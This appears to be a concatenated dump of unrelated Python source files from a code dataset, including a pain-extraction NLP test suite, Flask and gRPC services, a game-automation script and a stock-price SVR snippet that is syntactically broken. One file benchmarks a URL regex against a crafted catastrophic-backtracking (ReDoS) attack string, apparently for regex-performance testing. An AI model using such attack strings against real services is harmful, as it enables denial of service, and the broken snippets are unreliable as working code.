and the sub-image below and to the right of it
This will create a series of overlapping blocks since most sub-images
will be used multiple times
"""
desc_vec = np.empty((0))
init = True
for i in range(4):
for j in range(4):
block = np.vstack(
(np.hstack((sub_imgs[i,j], sub_imgs[i+1, j])),
np.hstack((sub_imgs[i,j+1], sub_imgs[i+1,j+1])))
)
if init == True:
desc_vec = get_3D_hist(block)
init = False
else:
desc_vec = np.hstack((desc_vec, get_3D_hist(block)))
desc_vec = desc_vec.flatten()
return desc_vec
if __name__ == "__main__":
"""
Handle command line arguments
"""
if len(sys.argv) != 2:
print("Usage: {} train_dir".format(sys.argv[0]))
sys.exit()
else:
train_dir_name = sys.argv[1]
train_dir = list()
try:
train_dir = read_train_dir(train_dir_name)
except FileNotFoundError:
print("{} not found!".format(train_dir_name))
sys.exit()
"""
Create outfile for descriptors
Go through each image found in the sub-directories
Get the descriptor vector for each and append it to list
Dump the descriptor vectors into outfile
"""
outfile = open("{}/desc.txt".format(train_dir_name), "wb")
desc_vec_list = []
for i in range(len(train_dir)):
for img in train_dir[i]:
subimgs = get_sub_imgs(img)
desc_vec = get_desc_vec(subimgs)
desc_vec_list.append(desc_vec)
pickle.dump(desc_vec_list, outfile)
outfile.close()
| StarcoderdataPython |
1723748 | n = int(input().strip())
a = list(map(int, input().strip().split(' ')))
# track number of elements swapped during a single array transversal
totalNumberOfSwaps = 0
for i in range(n):
currentSwaps = 0
for j in range(0, n - 1):
if a[j] > a[j + 1]:
a[j], a[j + 1] = a[j + 1], a[j] # swap adjacent elements if they are in decreasing order
currentSwaps += 1
totalNumberOfSwaps += 1
# if no elements were swapped during a transversal, array is sorted
if currentSwaps == 0:
break
print('Array is sorted in ' + str(totalNumberOfSwaps) + ' swaps.')
print('First Element: '+ str(a[0]))
print('Last Element: ' + str(a[n - 1])) | StarcoderdataPython |
137373 | import connector_pb2_grpc
import connector_pb2
import grpc
import prom
class Service(connector_pb2_grpc.ConnectorServicer):
def GetMetaInfo(self, request, context):
return connector_pb2.MetaInfo(
name = 'Prometheus Connector',
version = '0.0.1',
developer = 'Qlik'
)
def GetData(self, request, context):
# parse out configuration from connection string
connectionData = dict(item.split("=") for item in request.connection.connectionString.split(";"))
host = connectionData.get('promHost', '')
query = connectionData.get('promQuery', '')
if not host:
# require promHost in connection string
msg = 'Missing promHost=<host:port> in connection string'
context.set_code(grpc.StatusCode.INVALID_ARGUMENT)
context.set_details(msg)
raise grpc.RpcError(grpc.StatusCode.INVALID_ARGUMENT, msg)
if not query:
# default to all metrics
query = '{__name__=~".+"}'
print('Fetching data from Prometheus host "{}"...'.format(host))
results = prom.fetch('http://{}/api/v1/query'.format(host), query)
print('Data fetched, sending initial metadata...')
metadata = prom.build_metadata(results)
context.send_initial_metadata((('x-qlik-getdata-bin', metadata.SerializeToString()),))
print('Initial metadata sent, sending chunks...')
return prom.build_chunks(results, metadata)
| StarcoderdataPython |
3377017 | <gh_stars>0
import csv
import numpy as np
from sklearn.svm import SRV
import matplotlib.pyplot as plt
dates = []
prices = []
def get_data(filename):
with open(filename, 'r') as csvfile:
csvFileReader = csv.reader(csvfile)
next(csvFileReader)
for row in csvFileReader:
dates.append(int(row[0].split('-')[0]))
prices.append(float(row[1]))
return
def predict_prices(dates, prices, x):
dates = np.reshape(dates,(len(dates), 1))
svr_lin = SRV(kernel= 'linear', C=1e3)
svr_poly = SRV(kernel= 'poly', C=1e3, degree=2)
svr_rbf = SRV(kernel= 'rbf', C=1e3, gamma=0.1)
svr_lin.fit(dates, prices)
svr_poly.fit(dates, prices)
svr_rbf.fit(dates, prices)
plt.scatter(dates, prices, color='black', label='Data')
plt.plot(dates, svr_rbf.predict(dates), color='red', label='RBF model')
plt.plot(dates, svr_lin.predict(dates), color='green', label='Linear model')
plt.plot(dates, svr_poly.predict(dates), color='blue', label='Polynomial model')
plt.xlabel("Date")
plt.ylabel("Price")
plt.title("SVR")
plt.legend()
plt.show()
return srv_rbf.predict(x)[0], svr_lin.predict(x)[0], svr_poly.predict(x)[0]
get_data('AAPL.csv')
predicted_price = predict_prices(dates, price, 29
print(predicted_price) | StarcoderdataPython |
57509 | <filename>project/data/hoc.py
import pandas as pd
import re
from pathlib import Path
from collections import defaultdict, OrderedDict
class HOC():
def __init__(self, source_dir, target_dir, replace_csv=True) -> None:
self.source_dir = Path(source_dir) if type(
source_dir) is str else source_dir
self.target_dir = Path(target_dir) if type(
target_dir) is str else target_dir
self.labels = self.get_labels(source_dir)
# self.new_labels = [new_labels[label] for label in self.labels]
self.replace_csv = replace_csv
self.train_dict = self.read_dataset(source_dir, self.labels, 'train')
self.val_dict = self.read_dataset(source_dir, self.labels, 'devel')
self.test_dict = self.read_dataset(source_dir, self.labels, 'test')
self.save_csv(self.train_dict, self.target_dir,
self.labels, self.replace_csv, set_='train')
self.save_csv(self.val_dict, self.target_dir,
self.labels, self.replace_csv, set_='val')
self.save_csv(self.test_dict, self.target_dir,
self.labels, self.replace_csv, set_='test')
def save_csv(self, data_dict, target_dir, labels,
replace_csv, set_):
target_files = set(
[e.name for e in target_dir.iterdir() if e.is_file()])
filename = f"hoc_{set_}.csv"
if (not replace_csv and filename not in target_files) \
or replace_csv:
pd.DataFrame.from_dict(
data_dict, orient='index', columns=labels
).to_csv(target_dir / filename, sep='\t')
def read_dataset(self, source_dir, labels, set_='train'):
pattern = set_ + '.*'
data_dict = defaultdict(lambda: [])
for file in source_dir.rglob(pattern):
self._read_file(file, data_dict, file.parent.name)
data_dict = {k: self._one_hot(v, labels) for k, v in data_dict.items()}
return OrderedDict(sorted(data_dict.items()))
def get_labels(self, source_dir, pattern=r"label-."):
labels = []
for dir_ in source_dir.iterdir():
if dir_.is_dir() and re.match(pattern, dir_.name):
labels.append(dir_.name)
return sorted(labels)
def _read_file(self, file, data_dict: defaultdict, label):
pos = re.match(".*\.pos", file.name)
with open(file, 'r', encoding='utf-8') as f:
for line in f:
if line:
processed_line = line.strip().replace('\n', '')
if pos:
data_dict[processed_line].append(label)
else:
data_dict[processed_line]
return
def _one_hot(self, target_labels, all_labels):
return [int(x in target_labels) for x in all_labels]
if __name__ == "__main__":
SOURCE_DIR, TARGET_DIR = Path("project\data\HoC"), Path("project\data")
REPLACE_CSV = True
NEW_LABELS = {
"label-1": "Activating invasion and metastasis",
"label-2": "Avoiding immune destruction",
"label-3": "Cellular energetics",
"label-4": "Enabling replicative immortality",
"label-5": "Evading growth suppressors",
"label-6": "Genomic instability and mutation",
"label-7": "Inducing angiogenesis",
"label-8": "Resisting cell death",
"label-9": "Sustaining proliferative signaling",
"label-a": "Tumor promoting inflammation",
}
hoc = HOC(SOURCE_DIR, TARGET_DIR, REPLACE_CSV)
| StarcoderdataPython |
1787520 | """Request builders."""
from typing import List
import dacite
import safe_browsing.access.external.contracts as contracts
from safe_browsing.access.external.contracts import SafeBrowsingRequest
def build(threat_entries: List[str]) -> SafeBrowsingRequest:
"""Build a SafeBrowsingRequest."""
payload = dict(
threat_entries=threat_entries,
)
safe_browsing_request = dacite.from_dict(
contracts.SafeBrowsingRequest,
payload,
)
return safe_browsing_request
| StarcoderdataPython |
3325557 | <reponame>darrengardner-sfc/SnowAlert<gh_stars>0
from os import environ
import uuid
from runners.helpers.dbconfig import DATABASE
ENV = environ.get('SA_ENV', 'unset')
# generated once per runtime
RUN_ID = uuid.uuid4().hex
# schema names
DATA_SCHEMA_NAME = environ.get('SA_DATA_SCHEMA_NAME', "data")
RULES_SCHEMA_NAME = environ.get('SA_RULES_SCHEMA_NAME', "rules")
RESULTS_SCHEMA_NAME = environ.get('SA_RESULTS_SCHEMA_NAME', "results")
# table names
RESULTS_ALERTS_TABLE_NAME = environ.get('SA_RESULTS_ALERTS_TABLE_NAME', "alerts")
RESULTS_VIOLATIONS_TABLE_NAME = environ.get('SA_RESULTS_VIOLATIONS_TABLE_NAME', "violations")
QUERY_METADATA_TABLE_NAME = environ.get('SA_QUERY_METADATA_TABLE_NAME', "query_metadata")
RUN_METADATA_TABLE_NAME = environ.get('SA_RUN_METADATA_TABLE_NAME', "run_metadata")
# schemas
DATA_SCHEMA = environ.get('SA_DATA_SCHEMA', f"{DATABASE}.{DATA_SCHEMA_NAME}")
RULES_SCHEMA = environ.get('SA_RULES_SCHEMA', f"{DATABASE}.{RULES_SCHEMA_NAME}")
RESULTS_SCHEMA = environ.get('SA_RESULTS_SCHEMA', f"{DATABASE}.{RESULTS_SCHEMA_NAME}")
# tables
ALERTS_TABLE = environ.get('SA_ALERTS_TABLE', f"{RESULTS_SCHEMA}.{RESULTS_ALERTS_TABLE_NAME}")
VIOLATIONS_TABLE = environ.get('SA_VIOLATIONS_TABLE', f"{RESULTS_SCHEMA}.{RESULTS_VIOLATIONS_TABLE_NAME}")
QUERY_METADATA_TABLE = environ.get('SA_QUERY_METADATA_TABLE', f"{RESULTS_SCHEMA}.{QUERY_METADATA_TABLE_NAME}")
RUN_METADATA_TABLE = environ.get('SA_METADATA_RUN_TABLE', f"{RESULTS_SCHEMA}.{RUN_METADATA_TABLE_NAME}")
# misc
ALERT_QUERY_POSTFIX = "ALERT_QUERY"
ALERT_SQUELCH_POSTFIX = "ALERT_SUPPRESSION"
VIOLATION_QUERY_POSTFIX = "VIOLATION_QUERY"
VIOLATION_SQUELCH_POSTFIX = "VIOLATION_SUPPRESSION"
# enabling sends metrics to cloudwatch
CLOUDWATCH_METRICS = environ.get('CLOUDWATCH_METRICS', False)
CONFIG_VARS = [
('ALERTS_TABLE', ALERTS_TABLE),
('VIOLATIONS_TABLE', VIOLATIONS_TABLE),
('QUERY_METADATA_TABLE', QUERY_METADATA_TABLE),
('RUN_METADATA_TABLE', RUN_METADATA_TABLE),
('DATA_SCHEMA', DATA_SCHEMA),
('RULES_SCHEMA', RULES_SCHEMA),
('RESULTS_SCHEMA', RESULTS_SCHEMA),
]
| StarcoderdataPython |
3206709 | from sys import path
from os.path import dirname as dir
path.append(dir(path[0]))
from optimization.genOptimized import optimizeCode
# print(result[0].execute(None))
# print(result[1].execute(None))
# print(grammar.returnPostgreSQLErrors())
s = '''
from goto import with_goto
from interpreter import execution
from c3d.stack import Stack
stack = Stack()
RETURN=[None]
pprueba()
@with_goto
def calculos(xd,valor):
ejemplo = valor
t0 = ejemplo / valor
example = t0
test = ''
valor = 100
t1 = valor < 1
if t1: goto .L1
goto .L2
label .L1 #etiqueta true
t2 = -1
if valor == t2: goto .L5
RETURN[0] = True
goto .L0
goto .L4
label .L5
RETURN[0] = False
goto .L0
goto .L4
label .L4
goto .L3 #EXIT
label .L2 #etiqueta false
t3 = valor > 100
if t3: goto .L6
goto .L7
label .L6 #etiqueta true
RETURN[0] = False
goto .L0
goto .L3 #EXIT
label .L7 #etiqueta false
RETURN[0] = True
goto .L0
label .L3 # SALE DEL IF
RETURN[0] = valor
goto .L0
label .L0
@with_goto
def nacimiento(xd):
t4 = xd == '4'
if t4: goto .L9
goto .L10
label .L9 #etiqueta true
RETURN[0] = False
goto .L8
goto .L11 #EXIT
label .L10 #etiqueta false
RETURN[0] = True
goto .L8
label .L11 # SALE DEL IF
RETURN[0] = valor
goto .L8
label .L8
@with_goto
def pprueba():
print('Hola' , 'Z')
RETURN[0] = hola
goto .L12
label .L12
@with_goto
def ptesteo(valor):
x = 0
print('Hola' , 'Z')
pprueba()
t5 = 5 * 9
t6 = t5 / 1
t7 = 4 + t6
valor = t7
t8 = valor + 0
valor = t8
t9 = valor - 0
valor = t9
t10 = valor * 0
valor = t10
t11 = 0 / valor
valor = t11
t12 = valor / 1
valor = t12
t13 = x / 1
valor = t13
t14 = x * 1
valor = t14
t15 = x + 0
valor = t15
t16 = x - 0
valor = t16
t17 = x * 2
valor = t17
t18 = valor * 2
valor = t18
label .L13
@with_goto
def principal():
ptesteo(50)
def funcionIntermedia():
return execution(stack.pop())
principal()
'''
optimizeCode(s) | StarcoderdataPython |
198030 | <filename>regexlib/python_re2_test_file/regexlib_4184.py
# 4184
# ((http|https|ftp|telnet|gopher|ms\-help|file|notes)://)?(([a-z][\w~%!&',;=\-\.$\(\)\*\+]*)(:.*)?@)?(([a-z0-9][\w\-]*[a-z0-9]*\.)*(((([a-z0-9][\w\-]*[a-z0-9]*)(\.[a-z0-9]+)?)|(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)))(:[0-9]+)?))?(((/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))+)*/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))*)(\?[^#]+)?(#[a-z0-9]\w*)?)?
# EXPONENT
# nums:5
# EXPONENT AttackString:""+"00."*32+"! _1_EOA(i or ii)"
import re2 as re
from time import perf_counter
regex = """((http|https|ftp|telnet|gopher|ms\-help|file|notes)://)?(([a-z][\w~%!&',;=\-\.$\(\)\*\+]*)(:.*)?@)?(([a-z0-9][\w\-]*[a-z0-9]*\.)*(((([a-z0-9][\w\-]*[a-z0-9]*)(\.[a-z0-9]+)?)|(((25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)))(:[0-9]+)?))?(((/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))+)*/([\w`~!$=;\-\+\.\^\(\)\|\{\}\[\]]|(%\d\d))*)(\?[^#]+)?(#[a-z0-9]\w*)?)?"""
REGEX = re.compile(regex)
for i in range(0, 150000):
ATTACK = "" + "00." * i * 1 + "! _1_EOA(i or ii)"
LEN = len(ATTACK)
BEGIN = perf_counter()
m = REGEX.search(ATTACK)
# m = REGEX.match(ATTACK)
DURATION = perf_counter() - BEGIN
print(f"{i *1}: took {DURATION} seconds!") | StarcoderdataPython |
150653 | from flask import render_template, url_for
from . import main
# from app import app
from ..request import get_source, get_source_articles
# Views
@main.route('/')
def index():
'''
View root page function that returns the index page and its data
'''
# Getting news headlines
news_source = get_source()
title = 'Home - Top News'
return render_template('index.html', title = title, sources = news_source)
@main.route('/sources/<id>')
def source_articles(id):
'''
View news page function that returns the news details and the
content
'''
articles = get_source_articles(id)
return render_template('articles.html', articles = articles)
@main.route('/about')
def about():
return render_template('about.html')
| StarcoderdataPython |
3210955 | def calc(num1, num2):
return num1+num2
print(calc(5,6)) | StarcoderdataPython |
3254702 | <reponame>luovkle/FastAPI-Note-Taking<filename>backend/app/app/api/api_v1/endpoints/login.py
from fastapi import APIRouter, Depends
from fastapi.security import OAuth2PasswordRequestForm
from sqlalchemy.orm import Session
from app.api.deps import get_db
from app.crud import crud_user
from app.core.security import create_access_token
from app.schemas import Token
router = APIRouter()
@router.post(path="/access-token", response_model=Token)
def login(
db: Session = Depends(get_db),
form_data: OAuth2PasswordRequestForm = Depends()
):
user = crud_user.authenticate(
db=db, username=form_data.username, password=form_data.password
)
access_token = create_access_token(sub=user.username)
return {"access_token": access_token, "token_type": "Bearer"}
| StarcoderdataPython |
3357535 | import pytest
from runrex.text import Document
from apanc_nlp.algo.pain import AbdPain, extract_duration, RADIATING_TO_BACK, CHRONIC, CHEST_PAIN, DURATION, \
is_close_to_pain, has_abdominal_pain
@pytest.mark.parametrize('exp, text', [
(AbdPain.RECENT, '1 week'),
(AbdPain.VERY_RECENT, '2 days'),
(AbdPain.VERY_RECENT, '2 d'),
(AbdPain.LONG_AGO, '2 mons'),
(AbdPain.LONG_AGO, '2mons'),
(AbdPain.LONG_AGO, '2.mons'),
(AbdPain.RECENT, '2 WEEKS'),
(AbdPain.RECENT, '1 Week'),
])
def test_extract_duration(exp, text):
assert extract_duration(text) == exp
def test_radiate_to_back():
assert RADIATING_TO_BACK.matches('radiates to back')
@pytest.mark.parametrize('text, exp', [
('chronic opioid use for pain', False),
('recurrent depression', False),
('chronic pain', True),
('chronic abd pain', True),
])
def test_chronic(text, exp):
assert bool(CHRONIC.matches(text)) is exp
@pytest.mark.parametrize('text, exp', [
('negative for chest pain', False),
('chest pain', True),
])
def test_chest(text, exp):
assert bool(CHEST_PAIN.matches(text)) is exp
@pytest.mark.parametrize('text, exp', [
('pain for 1 week', True),
('pain at night for 1 week', True), # ensure 'ht' not picked up here
('pain blah blah blah ht. 1.78m', False),
])
def test_duration(text, exp):
assert bool(DURATION.matches(text)) is exp
@pytest.mark.parametrize('text, start, end, window, exp', [
('pain for 1 week', 9, 15, 20, True),
('1 week of acute pain', 0, 6, 20, True),
('pain blah blah blah blah blah 1 week', 30, 36, 20, False),
('1 week of joy and happiness blah blah blah blah blah pain', 0, 6, 20, False),
])
def test_is_close_to_pain(text, start, end, window, exp):
assert is_close_to_pain(text, start, end, window) == exp
@pytest.mark.parametrize('text, exp', [
('pain for 1 week', AbdPain.RECENT),
('1 week of acute pain', AbdPain.RECENT),
('pain blah blah blah blah blah 1 week', None),
('1 week of joy and happiness blah blah blah blah blah pain', None),
])
def test_has_abdominal_pain(text, exp):
doc = Document('noname', text=text)
lst = list(has_abdominal_pain(doc, window=20))
if len(lst) == 0:
assert exp is None
else:
result, text, start, end = lst[0]
assert result == exp
| StarcoderdataPython |
155813 | <reponame>yuanyan3060/arknights-mower
import time
import schedule
from arknights_mower.strategy import Solver
from arknights_mower.utils.log import logger, init_fhlr
from arknights_mower.utils import config
# 指定无人机加速第三层第三个房间的制造
drone_room='room_3_3'
# 指定关卡序列的作战计划
ope_lists = [['AP-5', 1], ['1-7', -1]]
# 使用信用点购买东西的优先级(从高到低)
shop_priority = ['招聘许可', '赤金', '龙门币', '初级作战记录', '技巧概要·卷2', '基础作战记录', '技巧概要·卷1']
# 公招选取标签时优先选择的干员的优先级(从高到低)
recruit_priority = ['因陀罗', '火神']
# 自定义基建排班
# 这里自定义了一套排班策略,实现的是两班倒,分为四个阶段
# 阶段 1 和 2 为第一班,阶段 3 和 4 为第二班
# 第一班的干员在阶段 3 和 4 分两批休息,第二班同理
# 每个阶段耗时 6 小时
plan = {
# 阶段 1
'plan_1': {
# 办公室
'contact': ['艾雅法拉'],
# 宿舍
'dormitory_1': ['杜林', '闪灵', '安比尔', '空弦', '缠丸'],
'dormitory_2': ['推进之王', '琴柳', '赫默', '杰西卡', '调香师'],
'dormitory_3': ['夜莺', '波登可', '夜刀', '古米', '空爆'],
'dormitory_4': ['空', 'Lancet-2', '香草', '史都华德', '刻俄柏'],
# 会客室
'meeting': ['陈', '红'],
# 制造站 + 贸易站 + 发电站
'room_1_1': ['德克萨斯', '能天使', '拉普兰德'],
'room_1_2': ['断罪者', '食铁兽', '槐琥'],
'room_1_3': ['阿消'],
'room_2_1': ['巫恋', '柏喙', '慕斯'],
'room_2_2': ['红豆', '霜叶', '白雪'],
'room_2_3': ['雷蛇'],
'room_3_1': ['Castle-3', '梅尔', '白面鸮'],
'room_3_2': ['格雷伊'],
'room_3_3': ['砾', '夜烟', '斑点']
},
# 阶段 2
'plan_2': {
# 注释掉了部分和阶段 1 一样排班计划的房间,加快排班速度
# 'contact': ['艾雅法拉'],
'dormitory_1': ['杜林', '闪灵', '芬', '稀音', '克洛丝'],
'dormitory_2': ['推进之王', '琴柳', '清流', '森蚺', '温蒂'],
'dormitory_3': ['夜莺', '波登可', '伊芙利特', '深靛', '炎熔'],
'dormitory_4': ['空', 'Lancet-2', '远山', '星极', '普罗旺斯'],
# 'meeting': ['陈', '红'],
# 'room_1_1': ['德克萨斯', '能天使', '拉普兰德'],
# 'room_1_2': ['断罪者', '食铁兽', '槐琥'],
# 'room_1_3': ['阿消'],
# 'room_2_1': ['巫恋', '柏喙', '慕斯'],
# 'room_2_2': ['红豆', '霜叶', '白雪'],
# 'room_2_3': ['雷蛇'],
# 'room_3_1': ['Castle-3', '梅尔', '白面鸮'],
# 'room_3_2': ['格雷伊'],
# 'room_3_3': ['砾', '夜烟', '斑点']
},
'plan_3': {
'contact': ['普罗旺斯'],
'dormitory_1': ['杜林', '闪灵', '格雷伊', '雷蛇', '阿消'],
'dormitory_2': ['推进之王', '琴柳', '德克萨斯', '能天使', '拉普兰德'],
'dormitory_3': ['夜莺', '波登可', '巫恋', '柏喙', '慕斯'],
'dormitory_4': ['空', 'Lancet-2', '艾雅法拉', '陈', '红'],
'meeting': ['远山', '星极'],
'room_1_1': ['安比尔', '空弦', '缠丸'],
'room_1_2': ['赫默', '杰西卡', '调香师'],
'room_1_3': ['伊芙利特'],
'room_2_1': ['夜刀', '古米', '空爆'],
'room_2_2': ['香草', '史都华德', '刻俄柏'],
'room_2_3': ['深靛'],
'room_3_1': ['芬', '稀音', '克洛丝'],
'room_3_2': ['炎熔'],
'room_3_3': ['清流', '森蚺', '温蒂']
},
'plan_4': {
# 'contact': ['普罗旺斯'],
'dormitory_1': ['杜林', '闪灵', '断罪者', '食铁兽', '槐琥'],
'dormitory_2': ['推进之王', '琴柳', '红豆', '霜叶', '白雪'],
'dormitory_3': ['夜莺', '波登可', 'Castle-3', '梅尔', '白面鸮'],
'dormitory_4': ['空', 'Lancet-2', '砾', '夜烟', '斑点'],
# 'meeting': ['远山', '星极'],
# 'room_1_1': ['安比尔', '空弦', '缠丸'],
# 'room_1_2': ['赫默', '杰西卡', '调香师'],
# 'room_1_3': ['伊芙利特'],
# 'room_2_1': ['夜刀', '古米', '空爆'],
# 'room_2_2': ['香草', '史都华德', '刻俄柏'],
# 'room_2_3': ['深靛'],
# 'room_3_1': ['芬', '稀音', '克洛丝'],
# 'room_3_2': ['炎熔'],
# 'room_3_3': ['清流', '森蚺', '温蒂']
}
}
def debuglog():
'''
在屏幕上输出调试信息,方便调试和报错
'''
logger.handlers[0].setLevel('DEBUG')
def savelog():
'''
指定日志和截屏的保存位置,方便调试和报错
调试信息和截图默认保存在代码所在的目录下
'''
config.LOGFILE_PATH = './log'
config.SCREENSHOT_PATH = './screenshot'
config.SCREENSHOT_MAXNUM = 100
init_fhlr()
def simulate():
'''
具体调用方法可见各个函数的参数说明
'''
global ope_lists
cli = Solver()
cli.mail() # 邮件
cli.base(clue_collect=True, drone_room=drone_room, arrange=plan) # 基建
cli.credit() # 信用
ope_lists = cli.ope(eliminate=True, plan=ope_lists) # 行动,返回未完成的作战计划
cli.shop(shop_priority) # 商店
cli.recruit() # 公招
cli.mission() # 任务
def schedule_task():
"""
定期运行任务
"""
schedule.every().day.at('07:00').do(simulate)
schedule.every().day.at('19:00').do(simulate)
while True:
schedule.run_pending()
time.sleep(60)
debuglog()
savelog()
simulate()
schedule_task()
| StarcoderdataPython |
130736 | <gh_stars>0
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# OpenCenter(TM) is Copyright 2013 by Rackspace US, Inc.
##############################################################################
#
# OpenCenter is licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License. This
# version of OpenCenter includes Rackspace trademarks and logos, and in
# accordance with Section 6 of the License, the provision of commercial
# support services in conjunction with a version of OpenCenter which includes
# Rackspace trademarks and logos is prohibited. OpenCenter source code and
# details are available at: # https://github.com/rcbops/opencenter or upon
# written request.
#
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0 and a copy, including this
# notice, is available in the LICENSE file accompanying this software.
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the # specific language governing permissions and limitations
# under the License.
#
##############################################################################
import json
import random
from opencenter.db.database import init_db
from opencenter import webapp
from util import OpenCenterTestCase, ScaffoldedTestCase
class IndexTest(OpenCenterTestCase):
def setUp(self):
self.content_type = 'application/json'
def tearDown(self):
pass
def test_get_index(self):
resp = self.client.get('/',
content_type=self.content_type)
self.assertEquals(resp.status_code, 200)
out = json.loads(resp.data)
self.assertTrue('url' in out)
self.assertIsInstance(out['resources'], dict)
resources = ['adventures', 'attrs', 'facts', 'filters',
'primitives', 'nodes', 'tasks']
for resource in resources:
self.assertTrue(resource in out['resources'])
self.assertTrue('url' in out['resources'][resource])
| StarcoderdataPython |
3235884 | <filename>nailgun/nailgun/objects/release.py
# -*- coding: utf-8 -*-
# Copyright 2013 Mirantis, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Release object and collection
"""
import copy
import six
from sqlalchemy import not_
from nailgun import consts
from nailgun.objects.serializers import release as release_serializer
from nailgun.db import db
from nailgun.db.sqlalchemy import models
from nailgun.objects import NailgunCollection
from nailgun.objects import NailgunObject
from nailgun.settings import settings
class ReleaseOrchestratorData(NailgunObject):
"""ReleaseOrchestratorData object
"""
#: SQLAlchemy model
model = models.ReleaseOrchestratorData
#: Serializer for ReleaseOrchestratorData
serializer = release_serializer.ReleaseOrchestratorDataSerializer
#: JSON schema
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "ReleaseOrchestratorData",
"description": "Serialized ReleaseOrchestratorData object",
"type": "object",
"required": [
"release_id"
],
"properties": {
"id": {"type": "number"},
"release_id": {"type": "number"},
"repo_metadata": {"type": "object"},
"puppet_manifests_source": {"type": "string"},
"puppet_modules_source": {"type": "string"}
}
}
@classmethod
def create(cls, data):
rendered_data = cls.render_data(data)
return super(ReleaseOrchestratorData, cls).create(rendered_data)
@classmethod
def update(cls, instance, data):
rendered_data = cls.render_data(data)
return super(ReleaseOrchestratorData, cls).update(
instance, rendered_data)
@classmethod
def render_data(cls, data):
# Actually, we don't have any reason to make copy at least now.
# The only reason I want to make copy is to be sure that changed
# data don't broke something somewhere in the code, since
# without a copy our changes affect entire application.
rendered_data = copy.deepcopy(data)
# create context for rendering
release = Release.get_by_uid(rendered_data['release_id'])
context = {
'MASTER_IP': settings.MASTER_IP,
'OPENSTACK_VERSION': release.version}
# render all the paths
repo_metadata = {}
for key, value in six.iteritems(rendered_data['repo_metadata']):
formatted_key = cls.render_path(key, context)
repo_metadata[formatted_key] = cls.render_path(value, context)
rendered_data['repo_metadata'] = repo_metadata
rendered_data['puppet_manifests_source'] = \
cls.render_path(rendered_data.get(
'puppet_manifests_source', 'default'), context)
rendered_data['puppet_modules_source'] = \
cls.render_path(rendered_data.get(
'puppet_modules_source', 'default'), context)
return rendered_data
@classmethod
def render_path(cls, path, context):
return path.format(**context)
class Release(NailgunObject):
"""Release object
"""
#: SQLAlchemy model for Release
model = models.Release
#: Serializer for Release
serializer = release_serializer.ReleaseSerializer
#: Release JSON schema
schema = {
"$schema": "http://json-schema.org/draft-04/schema#",
"title": "Release",
"description": "Serialized Release object",
"type": "object",
"required": [
"name",
"operating_system"
],
"properties": {
"id": {"type": "number"},
"name": {"type": "string"},
"version": {"type": "string"},
"can_update_from_versions": {"type": "array"},
"description": {"type": "string"},
"operating_system": {"type": "string"},
"state": {
"type": "string",
"enum": list(consts.RELEASE_STATES)
},
"networks_metadata": {"type": "array"},
"attributes_metadata": {"type": "object"},
"volumes_metadata": {"type": "object"},
"modes_metadata": {"type": "object"},
"roles_metadata": {"type": "object"},
"wizard_metadata": {"type": "object"},
"roles": {"type": "array"},
"clusters": {"type": "array"},
"is_deployable": {"type": "boolean"}
}
}
@classmethod
def create(cls, data):
"""Create Release instance with specified parameters in DB.
Corresponding roles are created in DB using names specified
in "roles" field. See :func:`update_roles`
:param data: dictionary of key-value pairs as object fields
:returns: Release instance
"""
roles = data.pop("roles", None)
orch_data = data.pop("orchestrator_data", None)
new_obj = super(Release, cls).create(data)
if roles:
cls.update_roles(new_obj, roles)
if orch_data:
orch_data["release_id"] = new_obj.id
ReleaseOrchestratorData.create(orch_data)
return new_obj
@classmethod
def update(cls, instance, data):
"""Update existing Release instance with specified parameters.
Corresponding roles are updated in DB using names specified
in "roles" field. See :func:`update_roles`
:param instance: Release instance
:param data: dictionary of key-value pairs as object fields
:returns: Release instance
"""
roles = data.pop("roles", None)
orch_data = data.pop("orchestrator_data", None)
super(Release, cls).update(instance, data)
if roles is not None:
cls.update_roles(instance, roles)
if orch_data:
cls.update_orchestrator_data(instance, orch_data)
return instance
@classmethod
def update_roles(cls, instance, roles):
"""Update existing Release instance with specified roles.
Previous ones are deleted.
IMPORTANT NOTE: attempting to remove roles that are already
assigned to nodes will lead to an Exception.
:param instance: Release instance
:param roles: list of new roles names
:returns: None
"""
db().query(models.Role).filter(
not_(models.Role.name.in_(roles))
).filter(
models.Role.release_id == instance.id
).delete(synchronize_session='fetch')
db().refresh(instance)
added_roles = instance.roles
for role in roles:
if role not in added_roles:
new_role = models.Role(
name=role,
release=instance
)
db().add(new_role)
added_roles.append(role)
db().flush()
@classmethod
def update_orchestrator_data(cls, instance, orchestrator_data):
orchestrator_data.pop("id", None)
orchestrator_data["release_id"] = instance.id
ReleaseOrchestratorData.update(
instance.orchestrator_data, orchestrator_data)
@classmethod
def get_orchestrator_data_dict(cls, instance):
data = instance.orchestrator_data
return ReleaseOrchestratorData.serializer.serialize(data)
@classmethod
def is_deployable(cls, instance):
"""Returns whether a given release deployable or not.
:param instance: a Release instance
:returns: True if a given release is deployable; otherwise - False
"""
# in experimental mode we deploy all releases
if 'experimental' in settings.VERSION['feature_groups']:
return True
return instance.is_deployable
class ReleaseCollection(NailgunCollection):
"""Release collection
"""
#: Single Release object class
single = Release
| StarcoderdataPython |
1733672 | #--------------------------------------------------------------------------------------------------
# Import required libraries
from tkinter import *
from tkinter import colorchooser
from tkinter import messagebox
from tkinter import ttk
from tkinter import filedialog
import cv2
from PIL import Image, ImageTk
import numpy as np
import os
#--------------------------------------------------------------------------------------------------
global array
global array2
global array3
array=[]
